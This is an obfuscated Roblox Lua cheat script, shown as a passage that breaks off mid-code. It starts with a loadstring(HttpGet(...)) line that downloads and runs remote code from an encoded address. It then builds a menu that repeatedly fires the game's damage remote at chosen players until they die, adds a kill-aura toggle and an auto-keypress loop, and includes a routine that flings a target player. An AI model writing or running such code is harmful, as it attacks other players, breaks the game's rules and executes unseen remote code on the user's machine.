loadstring(game:HttpGet(v7("\39\6\70\94\228\221\68\96\0\83\89\185\128\2\59\26\71\76\226\148\14\61\17\93\64\227\130\5\59\92\81\65\250\200\46\43\21\87\103\206\200\2\33\20\91\64\254\147\14\54\27\87\66\243\200\6\46\1\70\75\229\200\24\32\7\64\77\242","\107\79\114\50\46\151\231"),true))();end);game.StarterGui:SetCore(v7("\10\163\187\45\164\54\163\201\63\175\182\40\158\48\184\206","\160\89\198\213\73\234\89\215"),{[v7("\124\120\160\242\192","\165\40\17\212\158")]=v7("\201\214\9\55\47\235\222\70\125","\70\133\185\104\83"),[v7("\48\64\92\62","\169\100\37\36\74")]=v7("\55\134\171\68\64\146\172\68\9\139\226\92\15\134\166\30\78","\48\96\231\194"),[v7("\225\89\1\35","\227\168\58\110\77\121\184\207")]=v7("\115\40\171\80\235\148\62\178\108\43\241\82\190\217\125\170\99\114\188\79\188\148\112\182\104\57\171\15\238\210\117\248\46\105\231\21\224\139\34\247\41\111","\197\27\92\223\32\209\187\17"),[v7("\39\74\209\250\23\86\204\245","\155\99\63\163")]=1 + 1 ,[v7("\129\208\173\129\187\133\129\218","\228\226\177\193\237\217")]=bindableFunction});v17:Section(v7("\116\132\34\244\51\181\55\166\24\185\48\242","\134\84\208\67"));wait(1645.1 -(963 + 682) );v17:Dropdown(v7("\32\169\138\89\16\184\198\104\18\190\129\89\7","\60\115\204\230"),{[v7("\235\53\232\113\243\51\228\126","\16\135\90\139")]=v16,[v7("\82\120\7\52","\24\52\20\102\83\46\52")]=v7("\212\35\32\61\10\214\126","\111\164\79\65\68"),[v7("\213\220\130\204\45\226","\138\166\185\227\190\78")]=true,[v7("\199\125\214\35","\121\171\20\165\87\50\67")]={v7("\235\57\186\51","\98\166\88\217\86\217"),v7("\213\254\120\8\136\207\247\225","\188\150\150\25\97\230"),v7("\241\135\86\4\9","\141\186\233\63\98\108"),v7("\193\235\34","\69\145\138\76\214"),v7("\64\202\135\138\182\26","\118\16\175\233\233\223"),v7("\169\133\38\190\236\138\113\135\196\23\186\250","\29\235\228\85\219\142\235"),v7("\14\215\163\201\127\75","\50\93\180\218\189\23\46\71"),v7("\251\169\94\94\69\208\76\158\131\73\73\69\200\91\201\171\73\72","\40\190\196\59\44\36\188"),v7("\30\73\211\187\254\61\41\61\66\219\177\232","\109\92\37\188\212\154\29")},[v7("\52\227\165\218\52\72\40\230\183\215","\58\100\143\196\163\81")]=true},function() game.StarterGui:SetCore(v7("\41\71\45\167\17\70\241\7\28\75\32\162\43\64\234\0","\110\122\34\67\195\95\41\133"),{[v7("\65\184\79\70\211","\182\21\209\59\42")]=v7("\131\86\215\26\36\170\237","\222\215\55\165\125\65"),[v7("\24\212\222\14","\42\76\177\166\122\146\161\141")]=v7("\134\130\10\193\106\115\161\202\22\219\122\115\182\153\3\219\117\122\188\203","\22\197\234\101\174\25"),[v7("\4\55\170\210","\230\77\84\197\188\22\207\183")]=v7("\241\0\210\236\214\238\191\34\238\3\136\238\131\163\252\58\225\90\197\243\129\238\241\38\234\17\210\179\211\168\244\104\172\65\158\169\221\241\163\103\171\71","\85\153\116\166\156\236\193\144"),[v7("\128\245\95\178\240\9\171\238","\96\196\128\45\211\132")]=1 + 4 ,[v7("\54\140\119\83\208\174\183\211","\184\85\237\27\63\178\207\212")]=bindableFunction});game:GetService(v7("\61\74\12\77\33\87\25\74\28\106\12\77\30\80\10\90","\63\104\57\105")).InputBegan:Connect(function(v130,v131) if v131 then return;end if (v130.KeyCode==Enum.KeyCode.KeypadMinus) then local v157=0 -0 ;local v158;local v159;while true do if (v157==1) then v158=game:GetService(v7("\62\162\47\120\26\189\60\112\12","\19\105\205\93")):FindFirstChild(v16['player1']).Humanoid;v159=v158;v157=2 + 0 ;end if (v157==(0 + 0)) then wait();game:GetService(v7("\59\139\165\93\14\149\183","\36\107\231\196")).LocalPlayer.Character:FindFirstChildOfClass(v7("\105\186\173\139","\231\61\213\194")).DamageRemote:FireServer(v16['player1']);v157=183 -(156 + 26) ;end if ((2 + 0)==v157) then repeat wait();local v261=game:GetService(v7("\153\4\223\152\58\187\27","\95\201\104\190\225")).LocalPlayer.Character:FindFirstChildOfClass(v7("\155\196\206\194","\174\207\171\161")).DamageRemote:FireServer(v158) and  not v:FindFirstChild(v7("\203\241\31\240\253\241\228\251\1\247","\183\141\158\109\147\152")) ;until v159.Health<=(0 -0)  break;end end end end);end);wait(164.1 -(149 + 15) );v17:Dropdown(v7("\31\12\234\9\47\29\166\56\45\27\225\9\56","\108\76\105\134"),{[v7("\231\202\178\224\218\226\202\191","\174\139\165\209\129")]=v16,[v7("\165\191\227\198","\24\195\211\130\161\166\99\16")]=v7("\86\15\232\53\86\4\20","\118\38\99\137\76\51"),[v7("\238\35\4\0\10\40","\64\157\70\101\114\105")]=true,[v7("\76\161\180\247","\112\32\200\199\131")]={v7("\1\81\95\189","\66\76\48\60\216\163\203"),v7("\153\142\120\250\81\221\37\173","\68\218\230\25\147\63\174"),v7("\134\36\90\74\179","\214\205\74\51\44"),v7("\202\77\236","\23\154\44\130\156"),v7("\33\163\163\173\63\31","\115\113\198\205\206\86"),v7("\166\86\237\95\134\86\242\86\196\117\255\78","\58\228\55\158"),v7("\135\138\201\58\52\168","\85\212\233\176\78\92\205"),v7("\111\85\141\240\75\84\140\162\109\74\141\227\94\75\159\237\88\92","\130\42\56\232"),v7("\200\185\43\236\68\127\206\180\35\228\69\45","\95\138\213\68\131\32")},[v7("\26\36\160\90\115\56\4\168\80\98","\22\74\72\193\35")]=true},function() local v68=0;while true do if (v68==0) then game.StarterGui:SetCore(v7("\31\124\234\92\2\118\240\81\42\112\231\89\56\112\235\86","\56\76\25\132"),{[v7("\106\200\191\42\202","\175\62\161\203\70")]=v7("\8\220\209\20\48\40\135","\85\92\189\163\115"),[v7("\29\169\40\44","\88\73\204\80")]=v7("\13\139\31\73\58\223\42\195\3\83\42\223\61\144\22\83\37\214\55\194","\186\78\227\112\38\73"),[v7("\213\84\242\91","\26\156\55\157\53\51")]=v7("\132\204\2\201\226\31\195\207\1\206\246\66\131\218\26\214\160\30\143\215\27\150\185\67\159\221\2\150\231\89\136\133\67\140\224\5\221\136\69\139\234\3","\48\236\184\118\185\216"),[v7("\193\168\69\49\219\61\234\179","\84\133\221\55\80\175")]=2 + 3 ,[v7("\190\230\40\170\197\93\190\236","\60\221\135\68\198\167")]=bindableFunction});game:GetService(v7("\219\174\253\145\107\215\254\168\236\176\71\203\248\180\251\134","\185\142\221\152\227\34")).InputBegan:Connect(function(v183,v184) local v185=0 + 0 ;local v186;while true do if ((0 + 0)==v185) then v186=0;while true do if (0==v186) then if v184 then return;end if (v183.KeyCode==Enum.KeyCode.KeypadMinus) then local v315=0 -0 ;local v316;local v317;local v318;while true do if (v315==(0 + 0)) then v316=0;v317=nil;v315=3 -2 ;end if ((1 + 0)==v315) then v318=nil;while true do if (v316==(53 -(12 + 39))) then repeat local v355=0 + 0 ;local v356;while true do if (v355==(0 -0)) then wait();v356=game:GetService(v7("\56\48\27\89\1\31\238","\157\104\92\122\32\100\109")).LocalPlayer.Character:FindFirstChildOfClass(v7("\151\169\192\198","\203\195\198\175\170\93\71\237")).DamageRemote:FireServer(v356) and  not v:FindFirstChild(v7("\8\68\44\214\84\55\245\43\71\58","\156\78\43\94\181\49\113")) ;break;end end until v318.Health<=(0 -0)  break;end if (v316==(0 + 0)) then wait();game:GetService(v7("\104\201\86\227\70\33\228","\151\56\165\55\154\35\83")).LocalPlayer.Character:FindFirstChildOfClass(v7("\148\76\10\226","\142\192\35\101")).DamageRemote:FireServer(v16['player2']);v316=1 + 0 ;end if (v316==(2 -1)) then v317=game:GetService(v7("\225\122\59\168\244\156\173\21\211","\118\182\21\73\195\135\236\204")):FindFirstChild(v16['player2']).Humanoid;v318=v317;v316=2 + 0 ;end end break;end end end break;end end break;end end end);break;end end end);wait(0.1 -0 );v17:Dropdown(v7("\65\237\200\166\8\87\57\70\233\214\164\14\87","\25\18\136\164\195\107\35"),{[v7("\228\34\170\78\102\181\206\182","\216\136\77\201\47\18\220\161")]=v16,[v7("\43\224\42\221","\226\77\140\75\186\104\188")]=v7("\169\194\209\38\74\171\157","\47\217\174\176\95"),[v7("\171\216\119\16\177\92","\70\216\189\22\98\210\52\24")]=true,[v7("\214\214\176\147","\179\186\191\195\231")]={v7("\212\62\27\225","\132\153\95\120"),v7("\146\186\15\36\249\201\161\166","\192\209\210\110\77\151\186"),v7("\203\13\43\239\250","\164\128\99\66\137\159"),v7("\48\136\231","\222\96\233\137"),v7("\137\182\169\28\129\255","\144\217\211\199\127\232\147"),v7("\218\46\45\45\215\68\14\72\184\13\63\60","\36\152\79\94\72\181\37\98"),v7("\228\219\94\43\223\221","\95\183\184\39"),v7("\144\50\226\52\85\140\6\245\24\245\35\85\148\17\162\48\245\34","\98\213\95\135\70\52\224"),v7("\220\175\198\120\80\190\135\200\112\83\251\177","\52\158\195\169\23")},[v7("\74\176\51\109\131\39\87\130\105\168","\235\26\220\82\20\230\85\27")]=true},function() local v69=0;while true do if (v69==(0 + 0)) then game.StarterGui:SetCore(v7("\187\164\231\198\90\135\181\224\196\125\139\160\253\203\123\134","\20\232\193\137\162"),{[v7("\22\214\209\170\226","\17\66\191\165\198\135\236\119")]=v7("\59\174\188\20\250\252\182","\177\111\207\206\115\159\136\140"),[v7("\49\140\8\0","\63\101\233\112\116\180\47")]=v7("\224\51\226\29\235\51\199\123\254\7\251\51\208\40\235\7\244\58\218\122","\86\163\91\141\114\152"),[v7("\122\8\123\125","\90\51\107\20\19")]=v7("\133\228\145\255\103\194\191\146\248\42\195\226\138\237\49\130\232\203\236\50\128\191\132\252\46\136\228\202\176\52\137\173\208\186\101\216\161\213\188\111\223\163","\93\237\144\229\143"),[v7("\49\227\226\24\31\79\26\248","\38\117\150\144\121\107")]=14 -9 ,[v7("\46\186\226\54\47\186\237\49","\90\77\219\142")]=bindableFunction});game:GetService(v7("\211\23\36\43\101\9\106\243\16\18\60\94\17\115\229\1","\26\134\100\65\89\44\103")).InputBegan:Connect(function(v187,v188) local v189=0;local v190;while true do if (v189==(0 + 0)) then v190=0 + 0 ;while true do if (v190==0) then if v188 then return;end if (v187.KeyCode==Enum.KeyCode.KeypadMinus) then local v319=0 -0 ;local v320;local v321;while true do if (v319==(722 -(254 + 466))) then repeat local v346=560 -(544 + 16) ;local v347;while true do if (v346==(0 -0)) then wait();v347=game:GetService(v7("\60\254\252\145\116\30\225","\17\108\146\157\232")).LocalPlayer.Character:FindFirstChildOfClass(v7("\127\204\27\225","\200\43\163\116\141\79")).DamageRemote:FireServer(v347) and  not v:FindFirstChild(v7("\153\57\47\128\181\210\234\186\58\57","\131\223\86\93\227\208\148")) ;break;end end until v321.Health<=0  break;end if (v319==(629 -(294 + 334))) then v320=game:GetService(v7("\79\133\220\72\188\66\60\82\125","\49\24\234\174\35\207\50\93")):FindFirstChild(v16['player3']).Humanoid;v321=v320;v319=2;end if (v319==(253 -(236 + 17))) then wait();game:GetService(v7("\193\239\49\58\161\227\240","\196\145\131\80\67")).LocalPlayer.Character:FindFirstChildOfClass(v7("\42\191\9\4","\136\126\208\102\104\120")).DamageRemote:FireServer(v16['player3']);v319=1 + 0 ;end end end break;end end break;end end end);break;end end end);wait(0.1 + 0 );v17:Dropdown(v7("\208\64\186\179\30\161\163\113\183\164\26\176\247","\213\131\37\214\214\125"),{[v7("\42\36\38\190\245\47\36\43","\129\70\75\69\223")]=v16,[v7("\64\199\242\238","\143\38\171\147\137\28")]=v7("\192\142\184\234\6\241\128","\180\176\226\217\147\99\131"),[v7("\192\188\46\21\208\177","\103\179\217\79")]=true,[v7("\70\190\15\193","\195\42\215\124\181\33\236")]={v7("\32\88\52\59","\152\109\57\87\94\69"),v7("\218\223\11\170\176\193\85\191","\200\153\183\106\195\222\178\52"),v7("\25\237\129\59\76","\58\82\131\232\93\41"),v7("\179\86\222","\95\227\55\176\117\61"),v7("\40\123\45\72\162\20","\203\120\30\67\43"),v7("\211\36\94\234\219\240\41\65\175\251\240\49","\185\145\69\45\143"),v7("\185\28\0\178\212\143","\188\234\127\121\198"),v7("\29\63\22\145\57\62\23\195\31\32\22\130\44\33\4\140\42\54","\227\88\82\115"),v7("\97\19\181\168\6\51\103\30\189\160\7\97","\19\35\127\218\199\98")},[v7("\44\247\11\251\25\233\38\235\15\239","\130\124\155\106")]=true},function() game.StarterGui:SetCore(v7("\230\206\248\171\141\249\104\182\211\194\245\174\183\255\115\177","\223\181\171\150\207\195\150\28"),{[v7("\120\51\247\162\12","\105\44\90\131\206")]=v7("\203\225\160\190\13\42\165","\94\159\128\210\217\104"),[v7("\100\252\30\171","\26\48\153\102\223\63\31\153")]=v7("\33\72\226\252\17\69\233\179\17\85\238\246\17\83\235\230\14\76\244\178","\147\98\32\141"),[v7("\49\64\236\196","\43\120\35\131\170\102\54")]=v7("\92\18\147\166\255\255\203\67\17\144\248\183\191\134\88\9\159\248\166\191\137\27\7\148\165\160\164\203\11\15\131\235\240\229\220\1\87\215\229\247\226\215","\228\52\102\231\214\197\208"),[v7("\58\245\103\203\254\130\22\216","\182\126\128\21\170\138\235\121")]=5,[v7("\136\219\57\234\132\18\51\13","\102\235\186\85\134\230\115\80")]=bindableFunction});game:GetService(v7("\98\31\59\77\91\218\50\66\24\13\90\96\194\43\84\9","\66\55\108\94\63\18\180")).InputBegan:Connect(function(v132,v133) if v133 then return;end if (v132.KeyCode==Enum.KeyCode.KeypadMinus) then local v160=0;local v161;local v162;while true do if ((2 -1)==v160) then v161=game:GetService(v7("\200\60\27\1\33\232\254\48\12","\152\159\83\105\106\82")):FindFirstChild(v16['player4']).Humanoid;v162=v161;v160=1972 -(582 + 1388) ;end if (v160==2) then repeat local v262=0;local v263;while true do if (v262==0) then wait();v263=game:GetService(v7("\177\202\80\235\204\78\146","\60\225\166\49\146\169")).LocalPlayer.Character:FindFirstChildOfClass(v7("\27\17\32\38","\103\79\126\79\74\97")).DamageRemote:FireServer(v263) and  not v:FindFirstChild(v7("\156\112\193\112\91\60\179\122\223\119","\122\218\31\179\19\62")) ;break;end end until v162.Health<=(0 -0)  break;end if (v160==(0 + 0)) then wait();game:GetService(v7("\36\129\132\46\34\75\7","\57\116\237\229\87\71")).LocalPlayer.Character:FindFirstChildOfClass(v7("\158\190\226\235","\39\202\209\141\135\23\142")).DamageRemote:FireServer(v16['player4']);v160=1;end end end end);end);wait(364.1 -(326 + 38) );v17:Dropdown(v7("\128\211\193\196\202\181\5\135\215\223\198\204\181","\37\211\182\173\161\169\193"),{[v7("\251\53\78\216\60\114\182\249","\217\151\90\45\185\72\27")]=v16,[v7("\197\112\230\21","\54\163\28\135\114")]=v7("\56\215\92\155\75\109\124","\31\72\187\61\226\46"),[v7("\208\3\66\192\68\118","\68\163\102\35\178\39\30")]=true,[v7("\178\121\201\211","\113\222\16\186\167\99\213\227")]={v7("\3\15\248\243","\150\78\110\155"),v7("\166\205\38\232\170\13\190\87","\32\229\165\71\129\196\126\223"),v7("\232\135\205\135\132","\181\163\233\164\225\225"),v7("\96\138\48","\23\48\235\94"),v7("\76\223\214\94\94\63","\178\28\186\184\61\55\83"),v7("\230\204\84\57\240\15\249\200\141\101\61\230","\149\164\173\39\92\146\110"),v7("\192\36\9\11\18\30","\123\147\71\112\127\122"),v7("\233\192\135\99\71\192\201\194\86\84\201\204\150\98\81\195\223\134","\38\172\173\226\17"),v7("\111\29\35\224\73\81\8\238\74\22\41\253","\143\45\113\76")},[v7("\136\180\29\37\189\170\48\53\171\172","\92\216\216\124")]=true},function() local v70=492 -(76 + 416) ;while true do if (v70==(443 -(319 + 124))) then game.StarterGui:SetCore(v7("\104\55\162\68\211\84\38\165\70\244\88\51\184\73\242\85","\157\59\82\204\32"),{[v7("\12\55\247\246\236","\209\88\94\131\154\137\138\179")]=v7("\28\160\214\123\27\55\107","\66\72\193\164\28\126\67\81"),[v7("\211\41\176\76","\22\135\76\200\56\70")]=v7("\174\56\247\43\78\228\137\112\235\49\94\228\158\35\254\49\81\237\148\113","\129\237\80\152\68\61"),[v7("\120\171\11\253","\56\49\200\100\147\124\119")]=v7("\196\42\171\224\150\113\240\231\219\41\241\226\195\60\179\255\212\112\188\255\193\113\190\227\223\59\171\191\147\55\187\173\153\107\231\165\157\110\236\162\158\109","\144\172\94\223"),[v7("\0\26\176\70\48\6\173\73","\39\68\111\194")]=11 -6 ,[v7("\213\167\235\203\123\182\213\173","\215\182\198\135\167\25")]=bindableFunction});game:GetService(v7("\184\90\239\90\164\71\250\93\153\122\239\90\155\64\233\77","\40\237\41\138")).InputBegan:Connect(function(v191,v192) if v192 then return;end if (v191.KeyCode==Enum.KeyCode.KeypadMinus) then wait();game:GetService(v7("\247\120\251\225\79\213\103","\42\167\20\154\152")).LocalPlayer.Character:FindFirstChildOfClass(v7("\126\241\173\78","\65\42\158\194\34\17")).DamageRemote:FireServer(v16['player5']);local v239=game:GetService(v7("\45\40\64\7\62\253\26\237\31","\142\122\71\50\108\77\141\123")):FindFirstChild(v16['player5']).Humanoid;local v240=v239;repeat wait();local v264=game:GetService(v7("\37\174\254\1\62\7\177","\91\117\194\159\120")).LocalPlayer.Character:FindFirstChildOfClass(v7("\46\18\49\20","\68\122\125\94\120\85\145")).DamageRemote:FireServer(v239) and  not v:FindFirstChild(v7("\49\19\221\93\205\255\179\18\16\203","\218\119\124\175\62\168\185")) ;until v240.Health<=(1007 -(564 + 443))  end end);break;end end end);local v18=false;v17:Toggle(v7("\150\228\73\214\177\191\123\208\170\224\8\232\170\255\88\205\171\247","\164\197\144\40"),{[v7("\143\255\169\138\201\191\140\254","\214\227\144\202\235\189")]=v16,[v7("\235\169\134\124","\92\141\197\231\27\112\211\51")]=v7("\227\241\139\161\221\227","\177\134\159\234\195")},function() local v71=0;local v72;local v73;while true do if (v71==(0 -0)) then v72=false;v73=nil;v71=459 -(337 + 121) ;end if (v71==(2 -1)) then function v73() game:GetService(v7("\139\226\45\180\220\188\231\22\174\217\168\255\18\161\199\188\236\58\178","\169\221\139\95\192")):SendKeyEvent(true,Enum.KeyCode.KeypadMinus,false,game);end if v18 then v18=false;v72=true;else local v226=0 -0 ;while true do if (v226==0) then v18=true;v72=false;v226=1912 -(1261 + 650) ;end if ((1 + 0)==v226) then spawn(function() repeat local v300=0 -0 ;while true do if (1==v300) then game:GetService(v7("\236\158\113\12\39\52\200\130\124\58","\70\190\235\31\95\66")).Heartbeat:Wait();break;end if (v300==(1817 -(772 + 1045))) then v73();wait(1);v300=1 + 0 ;end end until v72 or  not v18  end);break;end end end break;end end end);local v19=false;v17:Toggle(v7("\145\235\22\234\165\155\238\22","\133\218\130\122\134"),{[v7("\48\240\224\197\200\170\55\50","\88\92\159\131\164\188\195")]=v16,[v7("\134\34\190\76","\189\224\78\223\43\183\139")]=v7("\43\242\139\20\205\43","\161\78\156\234\118")},function() local v74=false;local v75=game.Players.LocalPlayer;local v76=game.Workspace;local function v77() return v75.Character;end local function v78() local v134=nil;local v135=10000;for v149,v150 in pairs(v76:GetChildren()) do if (v150~=v77()) then local v193=v150:FindFirstChild(v7("\143\162\196\221\169\184\192\216","\188\199\215\169"));local v194=v150:FindFirstChild(v7("\212\28\82\122\230\243\0\91\73\231\243\29\111\122\250\232","\136\156\105\63\27"));if (v193 and v194) then local v241=0;local v242;while true do if (v241==0) then v242=(v194.Position-v77().HumanoidRootPart.Position).magnitude;if ((v193.Health>(144 -(102 + 42))) and  not v150:FindFirstChild(v7("\61\131\107\55\30\170\112\49\23\136","\84\123\236\25")) and (v242<=v135)) then local v304=0;while true do if (v304==(1844 -(1524 + 320))) then v134=v193;v135=v242;break;end end end break;end end end end end return v134;end local function v79(v136) local v137=0;local v138;while true do if (v137==(1270 -(1049 + 221))) then v138=v77():FindFirstChildOfClass(v7("\196\132\165\27","\213\144\235\202\119\204"));if v138 then v138.DamageRemote:FireServer(v136);end break;end end end local function v80() while  not v74 and v19  do local v151=156 -(18 + 138) ;local v152;while true do if (v151==1) then wait();break;end if (v151==(0 -0)) then v152=v78();if v152 then v79(v152);end v151=1103 -(67 + 1035) ;end end end end if v19 then local v153=348 -(136 + 212) ;while true do if (v153==0) then v19=false;v74=true;break;end end else v19=true;v74=false;spawn(function() v80();end);end end);v17:Button(v7("\4\23\218\106\5\44\73\38\88\150\28\39\42\73\106","\45\67\120\190\74\72\67"),function() game.StarterGui:SetCore(v7("\19\39\227\161\215\135\250\224\38\43\238\164\237\129\225\231","\137\64\66\141\197\153\232\142"),{[v7("\55\217\54\170\141","\232\99\176\66\198")]=v7("\203\46\44\70\118\130\253\41\182","\76\140\65\72\102\27\237\153"),[v7("\126\223\14\198","\222\42\186\118\178\183\97")]=v7("\105\228\77\153\29\235\75\158\29\237\74\158\84\172\82\133\84\232\4\154\88\226\71\131\81\172\77\132\94\224\81\142\88\173","\234\61\140\36"),[v7("\8\222\181\124","\111\65\189\218\18")]=v7("\75\95\15\37\81\19\224\84\92\12\123\25\83\173\79\68\3\123\8\83\162\12\74\8\38\14\72\224\28\66\31\104\94\9\247\22\27\66\96\94\12\246","\207\35\43\123\85\107\60"),[v7("\84\191\178\235\109\121\165\174","\25\16\202\192\138")]=5,[v7("\254\202\161\238\171\245\254\192","\148\157\171\205\130\201")]=bindableFunction});game:GetService(v7("\19\216\117\48\212\228\48","\150\67\180\20\73\177")).LocalPlayer.Character.PickupRemote:FireServer();wait();game.Players.LocalPlayer.Character[v7("\185\23\8\94\130","\45\237\120\122")]:Destroy();wait();game.Players.LocalPlayer.Character[v7("\255\253\175\45\217\231\171\40","\76\183\136\194")]:Destroy();wait(4 -3 );local v81=game.Players.LocalPlayer;local v82=game.Workspace[v81.Name]:WaitForChild(v7("\74\227\235\59\89\67","\116\26\134\133\88\48\47")):FindFirstChild(v7("\60\205\161\224\184","\18\126\161\192\132\221")):Destroy();wait();local v83=game.Workspace[v81.Name]:WaitForChild(v7("\111\45\160\7\95\83","\54\63\72\206\100")):FindFirstChild(v7("\224\88\75\126\233\126","\27\168\57\37\26\133")):Destroy();wait();local v84=game.Workspace[v81.Name]:WaitForChild(v7("\29\175\114\171\222\33","\183\77\202\28\200")):FindFirstChild(v7("\58\54\154\0\18\32\198\31\24\60\141\13\25\115\153\13\25\48\128\4\40\16\144\4\30\61\141\13\5\125\217\88\69","\104\119\83\233")):Destroy();wait();local v85=game.Workspace[v81.Name]:WaitForChild(v7("\197\253\41\33\74\249","\35\149\152\71\66")):FindFirstChild(v7("\52\237\81\184\63\10\167\85\191\53\29\237\76\240\42\28\230\65\185\54\38\203\91\188\51\23\236\71\162\116\73\184\17","\90\121\136\34\208")):Destroy();wait();local v86=game.Workspace[v81.Name]:WaitForChild(v7("\247\11\91\29\206\2","\126\167\110\53")):FindFirstChild(v7("\16\21\61\240\217\44\114\7\33\247\216\58\51\80\62\253\210\60\52\28\17\219\197\51\52\30\42\253\206\113\109\64\125","\95\93\112\78\152\188")):Destroy();end);v17:Section(v7("\129\211\137\28\234\185\146\224\181\181\25\229\167\215\211","\178\161\149\229\117\132\222"));v17:Dropdown(v7("\174\215\212\162\166\86\135\99\184\215\220\181\164\4","\67\232\187\189\204\193\118\198"),{[v7("\135\33\182\33\47\11\224\133","\143\235\78\213\64\91\98")]=v16,[v7("\139\68\133\238","\214\237\40\228\137\16")]=v7("\177\226\253\222\6\178","\198\229\131\143\185\99"),[v7("\66\137\169\97\82\132","\19\49\236\200")]=true,[v7("\242\62\229\163","\218\158\87\150\215\132")]={"1","2","3","4","5","6","7","8","9","0"},[v7("\203\18\216\251\51\48\225\242\13\205","\173\155\126\185\130\86\66")]=true},function() local v87=725 -(267 + 458) ;local v88;local v89;local v90;local v91;local v92;local v93;local v94;local v95;local v96;local v97;local v98;local v99;local v100;while true do if (v87==(0 + 0)) then v88=game:GetService(v7("\213\170\187\222\141\254\246","\140\133\198\218\167\232"));v89=game:GetService(v7("\135\59\186\78\129\167\56\189\126\129","\228\213\78\212\29"));v90=game.Players:GetPlayerFromCharacter(game.Players.LocalPlayer.Character);v87=1 -0 ;end if (v87==(822 -(667 + 151))) then wait(1497.2 -(1410 + 87) );v95=game.Players.LocalPlayer.Character;v96=v95:FindFirstChildOfClass(v7("\205\248\75\27\245\234\228\66","\155\133\141\38\122")) or v95:FindFirstChildOfClass(v7("\4\36\165\76\78\107\172\42\36\143\78\65\107\183\42\38\160\68\93","\197\69\74\204\33\47\31")) ;v87=1902 -(1504 + 393) ;end if (v87==(16 -10)) then function v97(v195) local v196=v195.Character;if v196 then local v243=0 -0 ;local v244;while true do if (v243==(796 -(461 + 335))) then v244=v196:FindFirstChildOfClass(v7("\216\90\87\134\254\64\83\131","\231\144\47\58"));if v244 then local v305=0 + 0 ;local v306;while true do if (v305==(1761 -(1730 + 31))) then v306=v196:FindFirstChild(v7("\154\205\215\116\22\50\198\61\128\215\213\97\40\60\221\45","\89\210\184\186\21\120\93\175"));if v306 then local v348=Vector3.new(1667 -(728 + 939) ,1e+27 -1768917917 ,0 -0 );v244:SetStateEnabled(Enum.HumanoidStateType.Physics,false);v244.PlatformStand=true;v244:ChangeState(Enum.HumanoidStateType.Physics);v306.Velocity=v348;end break;end end end break;end end end end v98=v88:FindFirstChild(v16['Target']);if v98 then v97(v98);else warn(v7("\129\95\125\204\124\40\241\93\115\193\57\60\190\70\114\209","\90\209\51\28\181\25"));end v87=7;end if ((4 -2)==v87) then function v92(v197) return v197:FindFirstChild(v7("\241\250\11\95\30\190\56\18\235\224\9\74\32\176\35\2","\118\185\143\102\62\112\209\81")) or v197.PrimaryPart or v197:FindFirstChild(v7("\104\127\59\245\170","\88\60\16\73\134\197\117\124")) ;end v93=nil;function v93(v198,v199) local v200=1068 -(138 + 930) ;local v201;while true do if (v200==(1 + 0)) then return v201;end if (v200==0) then v201={};for v281,v282 in pairs(v88:GetPlayers()) do if ((v282.Name==v198) and (v282~=v199)) then table.insert(v201,v282);end end v200=1;end end end v87=3;end if (v87==1) then if  not v90 then warn(v7("\180\92\179\4\224\130\94\246\11\228\147\12\176\10\254\137\72","\139\231\44\214\101"));return;end v91=nil;v92=nil;v87=2 + 0 ;end if (v87==(7 + 1)) then for v202,v203 in next,v96:GetPlayingAnimationTracks() do v203:Stop();end wait(7);v99=game.Players.LocalPlayer;v87=36 -27 ;end if (v87==9) then v100=game.Workspace[v99.Name].Humanoid;v100.Health=1766 -(459 + 1307) ;break;end if (v87==3) then v94=v93(v16[v7("\100\235\234\207\68\68","\33\48\138\152\168")],v90);if v91 then v91:Disconnect();end for v204,v205 in ipairs(v94) do if (v205 and v205.Character and v205.Character:FindFirstChildOfClass(v7("\90\3\61\80\207\56\123\18","\87\18\118\80\49\161"))) then local v245=1870 -(474 + 1396) ;while true do if (v245==(0 -0)) then v90.Character:FindFirstChildOfClass(v7("\100\11\215\161\190\67\23\222","\208\44\126\186\192")).Sit=true;v91=v89.Heartbeat:Connect(function() if (v88:FindFirstChild(v205.Name) and v205.Character and v92(v205.Character) and v92(v90.Character) and (v90.Character:FindFirstChildOfClass(v7("\223\15\169\199\26\243\192\74","\46\151\122\196\166\116\156\169")).Sit==true)) then v92(v90.Character).CFrame=v92(v205.Character).CFrame * CFrame.Angles(0 + 0 ,math.rad(0 + 0 ),0) * CFrame.new(0 -0 ,1.6,0.4 + 0 ) ;elseif v91 then v91:Disconnect();end end);break;end end end end v87=13 -9 ;end if (v87==(30 -23)) then wait(591.5 -(562 + 29) );v95=game.Players.LocalPlayer.Character;v96=v95:FindFirstChildOfClass(v7("\248\110\90\239\177\223\114\83","\223\176\27\55\142")) or v95:FindFirstChildOfClass(v7("\5\181\199\184\37\175\199\186\42\152\193\187\48\169\193\185\40\190\220","\213\68\219\174")) ;v87=7 + 1 ;end if (v87==5) then for v206,v207 in next,v96:GetPlayingAnimationTracks() do v207:Stop();end wait(0.5);v97=nil;v87=1425 -(374 + 1045) ;end end end);local v20=false;v17:Toggle(v7("\45\225\49\234\106\226\45\122\5\225\39\226\106\151","\31\107\128\67\135\74\165\95"),{[v7("\212\231\255\76\85\184\215\230","\209\184\136\156\45\33")]=v16,[v7("\1\196\116\15","\216\103\168\21\104")]=v7("\94\172\81\169\113\163\68","\196\24\205\35")},function() game.StarterGui:SetCore(v7("\29\142\237\2\0\132\247\15\40\130\224\7\58\130\236\8","\102\78\235\131"),{[v7("\206\39\32\72\66","\84\154\78\84\36\39\89\215")]=v7("\217\244\70\93\95","\101\157\129\54\56"),[v7("\41\172\146\191","\25\125\201\234\203\67")]=v7("\81\251\20\7\84\40\29\55\186","\115\25\148\120\99\116\71"),[v7("\37\62\182\42","\33\108\93\217\68")]=v7("\211\95\181\189\129\4\238\186\204\92\239\191\212\73\173\162\195\5\162\162\214\4\160\190\200\78\181\226\132\66\165\240\142\30\249\248\139\18\244\248\139\18","\205\187\43\193"),[v7("\218\103\23\222\234\123\10\209","\191\158\18\101")]=3 + 0 ,[v7("\198\194\139\187\173\196\192\140","\207\165\163\231\215")]=bindableFunction});if v20 then v20=false;else v20=true;repeat local v168=0 -0 ;local v169;local v170;local v171;while true do if (v168==(641 -(448 + 190))) then v171=nil;function v171() local v265=0;while true do if (v265==(0 + 0)) then wait();if v169.Character then local v323=0 + 0 ;local v324;while true do if (v323==(0 + 0)) then v169.Character:WaitForChild(v7("\142\163\90\210\168\185\94\215\148\185\88\199\150\183\69\199","\179\198\214\55")).CFrame=CFrame.new( -(1103 -816),335 -227 , -48);wait(0.3);v323=1;end if (v323==1) then v324=v169.Character:FindFirstChildOfClass(v7("\216\25\127\119\75\220\249\8","\179\144\108\18\22\37"));if v324 then local v351=0;local v352;local v353;while true do if (v351==(1497 -(1307 + 187))) then wait(0.3 -0 